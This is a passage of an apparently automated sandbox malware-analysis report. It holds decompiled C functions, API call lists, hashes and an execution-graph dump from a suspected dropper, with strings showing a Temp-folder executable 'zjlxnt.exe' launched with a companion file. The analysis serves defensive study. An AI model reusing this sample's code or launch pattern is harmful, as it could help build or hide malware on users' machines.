                                                          				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
                                                          					_push( *(_t64 - 0x38));
                                                          					E004065AF();
                                                          				}
                                                          				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t64 - 4));
                                                          				return 0;
                                                          			}















                                                          0x00401c43
                                                          0x00401c45
                                                          0x00401c4c
                                                          0x00401c4f
                                                          0x00401c52
                                                          0x00401c5c
                                                          0x00401c60
                                                          0x00401c63
                                                          0x00401c6c
                                                          0x00401c6c
                                                          0x00401c6f
                                                          0x00401c73
                                                          0x00401c7c
                                                          0x00401c7c
                                                          0x00401c7f
                                                          0x00401c83
                                                          0x00401c85
                                                          0x00401cda
                                                          0x00401cdc
                                                          0x00401ce7
                                                          0x00401cf1
                                                          0x00401cf4
                                                          0x00401cf4
                                                          0x00401cfd
                                                          0x00000000
                                                          0x00401c87
                                                          0x00401c8e
                                                          0x00401c90
                                                          0x00401c93
                                                          0x00401c99
                                                          0x00401ca0
                                                          0x00401ca3
                                                          0x00401ccb
                                                          0x00401d03
                                                          0x00401d03
                                                          0x00401ca5
                                                          0x00401cb3
                                                          0x00401cbb
                                                          0x00401cbe
                                                          0x00401cbe
                                                          0x00401ca3
                                                          0x00401d06
                                                          0x00401d09
                                                          0x00401d0f
                                                          0x00402ba4
                                                          0x00402ba4
                                                          0x00402c2d
                                                          0x00402c39

                                                          APIs
                                                          • SendMessageTimeoutW.USER32 ref: 00401CB3
                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.322461712.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.322455257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322470834.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322520599.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Timeout
                                                          • String ID: !
                                                          • API String ID: 1777923405-2657877971
                                                          • Opcode ID: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                                          • Instruction ID: e1c20d37316975b9b94706f7b3abd8da4b7b3b5136eece5bd2aa3cbae88a6c19
                                                          • Opcode Fuzzy Hash: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                                          • Instruction Fuzzy Hash: 28219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 91%
                                                          			E00406536(void* __ecx, void* __eflags, char _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
                                                          				int _v8;
                                                          				long _t21;
                                                          				long _t24;
                                                          				char* _t30;
                                                          
                                                          				asm("sbb eax, eax");
                                                          				_v8 = 0x800;
                                                          				_t5 =  &_a4; // 0x422728
                                                          				_t21 = E004064D5(__eflags,  *_t5, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
                                                          				_t30 = _a16;
                                                          				if(_t21 != 0) {
                                                          					L4:
                                                          					 *_t30 =  *_t30 & 0x00000000;
                                                          				} else {
                                                          					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
                                                          					_t21 = RegCloseKey(_a20);
                                                          					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
                                                          					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                                                          						goto L4;
                                                          					}
                                                          				}
                                                          				return _t21;
                                                          			}







                                                          0x00406544
                                                          0x00406546
                                                          0x0040655b
                                                          0x0040655e
                                                          0x00406563
                                                          0x00406568
                                                          0x004065a6
                                                          0x004065a6
                                                          0x0040656a
                                                          0x0040657c
                                                          0x00406587
                                                          0x0040658d
                                                          0x00406598
                                                          0x00000000
                                                          0x00000000
                                                          0x00406598
                                                          0x004065ac

                                                          APIs
                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,0040A230,00000000,('B,00000000,?,?,"C:\Users\user\AppData\Local\Temp\zjlxnt.exe" C:\Users\user\AppData\Local\Temp\anaictjg.cte,?,?,0040679D,80000002), ref: 0040657C
                                                          • RegCloseKey.ADVAPI32(?,?,0040679D,80000002,Software\Microsoft\Windows\CurrentVersion,"C:\Users\user\AppData\Local\Temp\zjlxnt.exe" C:\Users\user\AppData\Local\Temp\anaictjg.cte,"C:\Users\user\AppData\Local\Temp\zjlxnt.exe" C:\Users\user\AppData\Local\Temp\anaictjg.cte,"C:\Users\user\AppData\Local\Temp\zjlxnt.exe" C:\Users\user\AppData\Local\Temp\anaictjg.cte,00000000,00422728), ref: 00406587
                                                          Strings
                                                          • "C:\Users\user\AppData\Local\Temp\zjlxnt.exe" C:\Users\user\AppData\Local\Temp\anaictjg.cte, xrefs: 0040653D
                                                          • ('B, xrefs: 0040655B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.322461712.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.322455257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322470834.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322520599.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: CloseQueryValue
                                                          • String ID: "C:\Users\user\AppData\Local\Temp\zjlxnt.exe" C:\Users\user\AppData\Local\Temp\anaictjg.cte$('B
                                                          • API String ID: 3356406503-3268906875
                                                          • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                          • Instruction ID: 52dd0fe420a7c1e2827d1a164217834099ee72e945ce70567094b216899e5676
                                                          • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                          • Instruction Fuzzy Hash: C4017C72500209FADF21CF51DD09EDB3BA8EF54364F01803AFD1AA2190D738D964DBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 58%
                                                          			E00405F37(WCHAR* _a4) {
                                                          				WCHAR* _t9;
                                                          
                                                          				_t9 = _a4;
                                                          				_push( &(_t9[lstrlenW(_t9)]));
                                                          				_push(_t9);
                                                          				if( *(CharPrevW()) != 0x5c) {
                                                          					lstrcatW(_t9, 0x40a014);
                                                          				}
                                                          				return _t9;
                                                          			}




                                                          0x00405f38
                                                          0x00405f45
                                                          0x00405f46
                                                          0x00405f51
                                                          0x00405f59
                                                          0x00405f59
                                                          0x00405f61

                                                          APIs
                                                          • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F3D
                                                          • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F47
                                                          • lstrcatW.KERNEL32(?,0040A014), ref: 00405F59
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F37
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.322461712.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.322455257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322470834.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322520599.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: CharPrevlstrcatlstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 2659869361-823278215
                                                          • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                          • Instruction ID: 9007417a49851ea4d61da9c71e51c63d156abd36d345156a737e00ee84923012
                                                          • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                          • Instruction Fuzzy Hash: 59D05E611019246AC111AB548D04DDB63ACAE85304742046AF601B60A0CB7E196287ED
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 89%
                                                          			E0040563E(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                          				int _t15;
                                                          				long _t16;
                                                          
                                                          				_t15 = _a8;
                                                          				if(_t15 != 0x102) {
                                                          					if(_t15 != 0x200) {
                                                          						_t16 = _a16;
                                                          						L7:
                                                          						if(_t15 == 0x419 &&  *0x423734 != _t16) {
                                                          							_push(_t16);
                                                          							_push(6);
                                                          							 *0x423734 = _t16;
                                                          							E00404FFF();
                                                          						}
                                                          						L11:
                                                          						return CallWindowProcW( *0x42373c, _a4, _t15, _a12, _t16);
                                                          					}
                                                          					if(IsWindowVisible(_a4) == 0) {
                                                          						L10:
                                                          						_t16 = _a16;
                                                          						goto L11;
                                                          					}
                                                          					_t16 = E00404F7F(_a4, 1);
                                                          					_t15 = 0x419;
                                                          					goto L7;
                                                          				}
                                                          				if(_a12 != 0x20) {
                                                          					goto L10;
                                                          				}
                                                          				E00404610(0x413);
                                                          				return 0;
                                                          			}





                                                          0x00405642
                                                          0x0040564c
                                                          0x00405668
                                                          0x0040568a
                                                          0x0040568d
                                                          0x00405693
                                                          0x0040569d
                                                          0x0040569e
                                                          0x004056a0
                                                          0x004056a6
                                                          0x004056a6
                                                          0x004056b0
                                                          0x00000000
                                                          0x004056be
                                                          0x00405675
                                                          0x004056ad
                                                          0x004056ad
                                                          0x00000000
                                                          0x004056ad
                                                          0x00405681
                                                          0x00405683
                                                          0x00000000
                                                          0x00405683
                                                          0x00405652
                                                          0x00000000
                                                          0x00000000
                                                          0x00405659
                                                          0x00000000

                                                          APIs
                                                          • IsWindowVisible.USER32 ref: 0040566D
                                                          • CallWindowProcW.USER32(?,?,?,?), ref: 004056BE
                                                            • Part of subcall function 00404610: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.322461712.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.322455257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322470834.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322520599.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: Window$CallMessageProcSendVisible
                                                          • String ID:
                                                          • API String ID: 3748168415-3916222277
                                                          • Opcode ID: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                                          • Instruction ID: 537e1cae7e4c88fb21f4f8cfd237bdd46b0b38e99f2a5e053ca6ba0093d9a5c8
                                                          • Opcode Fuzzy Hash: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                                          • Instruction Fuzzy Hash: 4401B171200608AFEF205F11DD84A6B3A35EB84361F904837FA08752E0D77F8D929E6D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E004060BD(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                                          				int _v8;
                                                          				int _t12;
                                                          				int _t14;
                                                          				int _t15;
                                                          				CHAR* _t17;
                                                          				CHAR* _t27;
                                                          
                                                          				_t12 = lstrlenA(_a8);
                                                          				_t27 = _a4;
                                                          				_v8 = _t12;
                                                          				while(lstrlenA(_t27) >= _v8) {
                                                          					_t14 = _v8;
                                                          					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                                          					_t15 = lstrcmpiA(_t27, _a8);
                                                          					_t27[_v8] =  *(_t14 + _t27);
                                                          					if(_t15 == 0) {
                                                          						_t17 = _t27;
                                                          					} else {
                                                          						_t27 = CharNextA(_t27);
                                                          						continue;
                                                          					}
                                                          					L5:
                                                          					return _t17;
                                                          				}
                                                          				_t17 = 0;
                                                          				goto L5;
                                                          			}









                                                          0x004060cd
                                                          0x004060cf
                                                          0x004060d2
                                                          0x004060fe
                                                          0x004060d7
                                                          0x004060e0
                                                          0x004060e5
                                                          0x004060f0
                                                          0x004060f3
                                                          0x0040610f
                                                          0x004060f5
                                                          0x004060fc
                                                          0x00000000
                                                          0x004060fc
                                                          0x00406108
                                                          0x0040610c
                                                          0x0040610c
                                                          0x00406106
                                                          0x00000000

                                                          APIs
                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                                          • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060E5
                                                          • CharNextA.USER32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060F6
                                                          • lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.322461712.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.322455257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322470834.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322520599.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                          • String ID:
                                                          • API String ID: 190613189-0
                                                          • Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                          • Instruction ID: 2f06b96f93541eceebcae48a9adfe7aedd37cb678349478f8cad11de2473fd3e
                                                          • Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                          • Instruction Fuzzy Hash: 0BF0F631104054FFDB12DFA4CD00D9EBBA8EF06350B2640BAE841FB321D674DE11A798
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Execution Graph

                                                          Execution Coverage:7.4%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:0.8%
                                                          Total number of Nodes:1697
                                                          Total number of Limit Nodes:44
                                                          execution_graph 11014 40b0c1 11015 40b0f8 11014->11015 11016 40b0da 11014->11016 11016->11015 11017 407a41 44 API calls 11016->11017 11018 407991 2 API calls 11016->11018 11017->11016 11018->11016 10100 403d54 10103 402081 10100->10103 10104 402093 10103->10104 10105 4020a5 10103->10105 10104->10105 10108 40209b 10104->10108 10117 402403 10105->10117 10107 4020a3 10108->10107 10110 402403 __InternalCxxFrameHandler 49 API calls 10108->10110 10111 4020c3 10110->10111 10113 402403 __InternalCxxFrameHandler 49 API calls 10111->10113 10112 402403 __InternalCxxFrameHandler 49 API calls 10112->10107 10114 4020ce 10113->10114 10131 406182 10114->10131 10137 402411 10117->10137 10119 402408 10120 4020aa 10119->10120 10151 40b2c7 10119->10151 10120->10107 10120->10112 10123 40624e 10125 406258 IsProcessorFeaturePresent 10123->10125 10126 406277 10123->10126 10127 406264 10125->10127 10128 4059b6 __FrameHandler3::FrameUnwindToState 21 API calls 10126->10128 10129 40636b __FrameHandler3::FrameUnwindToState 8 API calls 10127->10129 10130 406281 10128->10130 10129->10126 10132 40618e ___scrt_is_nonwritable_in_current_image 10131->10132 10133 406c70 _unexpected 39 API calls 10132->10133 10134 406193 10133->10134 10135 40623e __FrameHandler3::FrameUnwindToState 39 API calls 10134->10135 10136 4061bd 10135->10136 10138 40241a 10137->10138 10139 40241d GetLastError 10137->10139 10138->10119 10181 4026f4 10139->10181 10142 402497 SetLastError 10142->10119 10143 40272f ___vcrt_FlsSetValue 6 API calls 10144 40244b __InternalCxxFrameHandler 10143->10144 10145 402473 10144->10145 10146 40272f ___vcrt_FlsSetValue 6 API calls 10144->10146 10150 402451 10144->10150 10147 40272f ___vcrt_FlsSetValue 6 API calls 10145->10147 10148 402487 10145->10148 10146->10145 10147->10148 10186 4061be 10148->10186 10150->10142 10189 40b1f5 10151->10189 10154 40b30c 10155 40b318 ___scrt_is_nonwritable_in_current_image 10154->10155 10156 406dc1 __dosmaperr 14 API calls 10155->10156 10157 40b368 10155->10157 10159 40b37a __FrameHandler3::FrameUnwindToState 10155->10159 10164 40b349 __FrameHandler3::FrameUnwindToState 10155->10164 10156->10164 10158 407b6a __dosmaperr 14 API calls 10157->10158 10160 40b36d 10158->10160 10161 40b3b0 __FrameHandler3::FrameUnwindToState 10159->10161 10200 409f3e EnterCriticalSection 10159->10200 10162 406567 ___std_exception_copy 39 API calls 10160->10162 10166 40b4ea 10161->10166 10167 40b3ed 10161->10167 10177 40b41b 10161->10177 10180 40b352 10162->10180 10164->10157 10164->10159 10164->10180 10169 40b4f5 10166->10169 10205 409f86 LeaveCriticalSection 10166->10205 10173 406c70 _unexpected 39 API calls 10167->10173 10167->10177 10170 4059b6 __FrameHandler3::FrameUnwindToState 21 API calls 10169->10170 10172 40b4fd 10170->10172 10175 40b410 10173->10175 10174 406c70 _unexpected 39 API calls 10178 40b470 10174->10178 10176 406c70 _unexpected 39 API calls 10175->10176 10176->10177 10201 40b496 10177->10201 10179 406c70 _unexpected 39 API calls 10178->10179 10178->10180 10179->10180 10180->10123 10182 402593 ___vcrt_InitializeCriticalSectionEx 5 API calls 10181->10182 10183 40270e 10182->10183 10184 402726 TlsGetValue 10183->10184 10185 402432 10183->10185 10184->10185 10185->10142 10185->10143 10185->10150 10187 408694 __freea 14 API calls 10186->10187 10188 4061d6 10187->10188 10188->10150 10190 40b201 ___scrt_is_nonwritable_in_current_image 10189->10190 10195 409f3e EnterCriticalSection 10190->10195 10192 40b20f 10196 40b251 10192->10196 10195->10192 10199 409f86 LeaveCriticalSection 10196->10199 10198 406243 10198->10123 10198->10154 10199->10198 10200->10161 10202 40b462 10201->10202 10203 40b49a 10201->10203 10202->10174 10202->10178 10202->10180 10206 409f86 LeaveCriticalSection 10203->10206 10205->10169 10206->10202 11053 4011db 11054 4011e3 11053->11054 11070 405a35 11054->11070 11056 4011ee 11077 4014db 11056->11077 11058 401796 4 API calls 11059 401285 11058->11059 11060 401203 __RTC_Initialize 11068 401260 11060->11068 11083 401668 11060->11083 11062 40121c 11062->11068 11086 401722 InitializeSListHead 11062->11086 11064 401232 11087 401731 11064->11087 11066 401255 11093 405c06 11066->11093 11068->11058 11069 40127d 11068->11069 11071 405a44 11070->11071 11072 405a67 11070->11072 11071->11072 11073 407b6a __dosmaperr 14 API calls 11071->11073 11072->11056 11074 405a57 11073->11074 11075 406567 ___std_exception_copy 39 API calls 11074->11075 11076 405a62 11075->11076 11076->11056 11078 4014e7 11077->11078 11079 4014eb 11077->11079 11078->11060 11080 401796 4 API calls 11079->11080 11082 4014f8 ___scrt_release_startup_lock 11079->11082 11081 401561 11080->11081 11082->11060 11100 40163b 11083->11100 11086->11064 11135 406123 11087->11135 11089 401749 11089->11066 11090 401742 11090->11089 11091 401796 4 API calls 11090->11091 11092 401751 11091->11092 11094 406c70 _unexpected 39 API calls 11093->11094 11095 405c11 11094->11095 11096 407b6a __dosmaperr 14 API calls 11095->11096 11099 405c49 11095->11099 11097 405c3e 11096->11097 11098 406567 ___std_exception_copy 39 API calls 11097->11098 11098->11099 11099->11068 11101 401651 11100->11101 11102 40164a 11100->11102 11109 405fb3 11101->11109 11106 405f36 11102->11106 11105 40164f 11105->11062 11107 405fb3 42 API calls 11106->11107 11108 405f48 11107->11108 11108->11105 11112 405cff 11109->11112 11113 405d0b ___scrt_is_nonwritable_in_current_image 11112->11113 11120 409f3e EnterCriticalSection 11113->11120 11115 405d19 11121 405d5a 11115->11121 11117 405d26 11131 405d4e 11117->11131 11120->11115 11122 405d75 11121->11122 11123 405de8 _unexpected 11121->11123 11122->11123 11124 405dc8 11122->11124 11125 40b042 42 API calls 11122->11125 11123->11117 11124->11123 11126 40b042 42 API calls 11124->11126 11127 405dbe 11125->11127 11128 405dde 11126->11128 11129 408694 __freea 14 API calls 11127->11129 11130 408694 __freea 14 API calls 11128->11130 11129->11124 11130->11123 11134 409f86 LeaveCriticalSection 11131->11134 11133 405d37 11133->11105 11134->11133 11136 406141 11135->11136 11140 406161 11135->11140 11137 407b6a __dosmaperr 14 API calls 11136->11137 11138 406157 11137->11138 11139 406567 ___std_exception_copy 39 API calls 11138->11139 11139->11140 11140->11090 11153 405bdf 11156 405b66 11153->11156 11157 405b72 ___scrt_is_nonwritable_in_current_image 11156->11157 11164 409f3e EnterCriticalSection 11157->11164 11159 405baa 11165 405bc8 11159->11165 11161 405b7c 11161->11159 11163 40ab5c __wsopen_s 14 API calls 11161->11163 11163->11161 11164->11161 11168 409f86 LeaveCriticalSection 11165->11168 11167 405bb6 11168->11167 9670 407f0d 9675 407ce3 9670->9675 9673 407f4c 9676 407d02 9675->9676 9677 407d15 9676->9677 9686 407d2a 9676->9686 9678 407b6a __dosmaperr 14 API calls 9677->9678 9679 407d1a 9678->9679 9680 406567 ___std_exception_copy 39 API calls 9679->9680 9682 407d25 9680->9682 9681 407e4a 9681->9682 9683 407b6a __dosmaperr 14 API calls 9681->9683 9682->9673 9692 40c397 9682->9692 9684 407efb 9683->9684 9685 406567 ___std_exception_copy 39 API calls 9684->9685 9685->9682 9686->9681 9695 40bc07 9686->9695 9688 407e9a 9688->9681 9689 40bc07 39 API calls 9688->9689 9690 407eb8 9689->9690 9690->9681 9691 40bc07 39 API calls 9690->9691 9691->9681 9727 40bd3f 9692->9727 9696 40bc16 9695->9696 9697 40bc5e 9695->9697 9699 40bc1c 9696->9699 9700 40bc39 9696->9700 9709 40bc74 9697->9709 9702 407b6a __dosmaperr 14 API calls 9699->9702 9704 407b6a __dosmaperr 14 API calls 9700->9704 9708 40bc57 9700->9708 9701 40bc2c 9701->9688 9703 40bc21 9702->9703 9705 406567 ___std_exception_copy 39 API calls 9703->9705 9706 40bc48 9704->9706 9705->9701 9707 406567 ___std_exception_copy 39 API calls 9706->9707 9707->9701 9708->9688 9710 40bc84 9709->9710 9711 40bc9e 9709->9711 9712 407b6a __dosmaperr 14 API calls 9710->9712 9713 40bca6 9711->9713 9714 40bcbd 9711->9714 9717 40bc89 9712->9717 9718 407b6a __dosmaperr 14 API calls 9713->9718 9715 40bce0 9714->9715 9716 40bcc9 9714->9716 9723 4080af __wsopen_s 39 API calls 9715->9723 9726 40bc94 9715->9726 9719 407b6a __dosmaperr 14 API calls 9716->9719 9720 406567 ___std_exception_copy 39 API calls 9717->9720 9721 40bcab 9718->9721 9722 40bcce 9719->9722 9720->9726 9724 406567 ___std_exception_copy 39 API calls 9721->9724 9725 406567 ___std_exception_copy 39 API calls 9722->9725 9723->9726 9724->9726 9725->9726 9726->9701 9730 40bd4b ___scrt_is_nonwritable_in_current_image 9727->9730 9728 40bd52 9729 407b6a __dosmaperr 14 API calls 9728->9729 9731 40bd57 9729->9731 9730->9728 9732 40bd7d 9730->9732 9733 406567 ___std_exception_copy 39 API calls 9731->9733 9738 40c329 9732->9738 9735 40bd61 9733->9735 9735->9673 9751 408d77 9738->9751 9743 40c35f 9745 408694 __freea 14 API calls 9743->9745 9746 40bda1 9743->9746 9745->9746 9747 40bdd4 9746->9747 9748 40be18 9747->9748 9749 40bdda 9747->9749 9748->9735 10012 40a1ec LeaveCriticalSection 9749->10012 9752 4080af __wsopen_s 39 API calls 9751->9752 9753 408d89 9752->9753 9754 408d9b 9753->9754 9806 40ada4 9753->9806 9756 40885e 9754->9756 9812 4086e6 9756->9812 9759 40c3b7 9842 40c105 9759->9842 9762 40c402 9860 40a20f 9762->9860 9763 40c3e9 9765 407b57 __dosmaperr 14 API calls 9763->9765 9767 40c3ee 9765->9767 9772 407b6a __dosmaperr 14 API calls 9767->9772 9768 40c410 9770 407b57 __dosmaperr 14 API calls 9768->9770 9769 40c427 9873 40c070 CreateFileW 9769->9873 9773 40c415 9770->9773 9796 40c3fb 9772->9796 9774 407b6a __dosmaperr 14 API calls 9773->9774 9774->9767 9775 40c4dd GetFileType 9776 40c4e8 GetLastError 9775->9776 9777 40c52f 9775->9777 9780 407b10 __dosmaperr 14 API calls 9776->9780 9875 40a15a 9777->9875 9778 40c4b2 GetLastError 9779 407b10 __dosmaperr 14 API calls 9778->9779 9779->9767 9782 40c4f6 CloseHandle 9780->9782 9781 40c460 9781->9775 9781->9778 9874 40c070 CreateFileW 9781->9874 9782->9767 9786 40c51f 9782->9786 9785 40c4a5 9785->9775 9785->9778 9788 407b6a __dosmaperr 14 API calls 9786->9788 9790 40c524 9788->9790 9789 40c59c 9794 40c5a3 9789->9794 9905 40be1a 9789->9905 9790->9767 9899 40e6a0 9794->9899 9795 40c5df 9795->9796 9798 40c65b CloseHandle 9795->9798 9796->9743 9932 40c070 CreateFileW 9798->9932 9800 40c686 9801 40c690 GetLastError 9800->9801 9802 40c6bc 9800->9802 9803 407b10 __dosmaperr 14 API calls 9801->9803 9802->9796 9804 40c69c 9803->9804 9933 40a322 9804->9933 9809 40abac 9806->9809 9810 40acdf _unexpected 5 API calls 9809->9810 9811 40abc2 9810->9811 9811->9754 9813 4086f4 9812->9813 9814 40870e 9812->9814 9830 408db6 9813->9830 9815 408734 9814->9815 9816 408715 9814->9816 9818 409976 __wsopen_s MultiByteToWideChar 9815->9818 9829 4086fe 9816->9829 9834 408e0c 9816->9834 9820 408743 9818->9820 9821 40874a GetLastError 9820->9821 9822 408770 9820->9822 9824 408e0c __wsopen_s 15 API calls 9820->9824 9823 407b10 __dosmaperr 14 API calls 9821->9823 9825 409976 __wsopen_s MultiByteToWideChar 9822->9825 9822->9829 9826 408756 9823->9826 9824->9822 9827 408787 9825->9827 9828 407b6a __dosmaperr 14 API calls 9826->9828 9827->9821 9827->9829 9828->9829 9829->9743 9829->9759 9831 408dc1 9830->9831 9832 408dc9 9830->9832 9833 408694 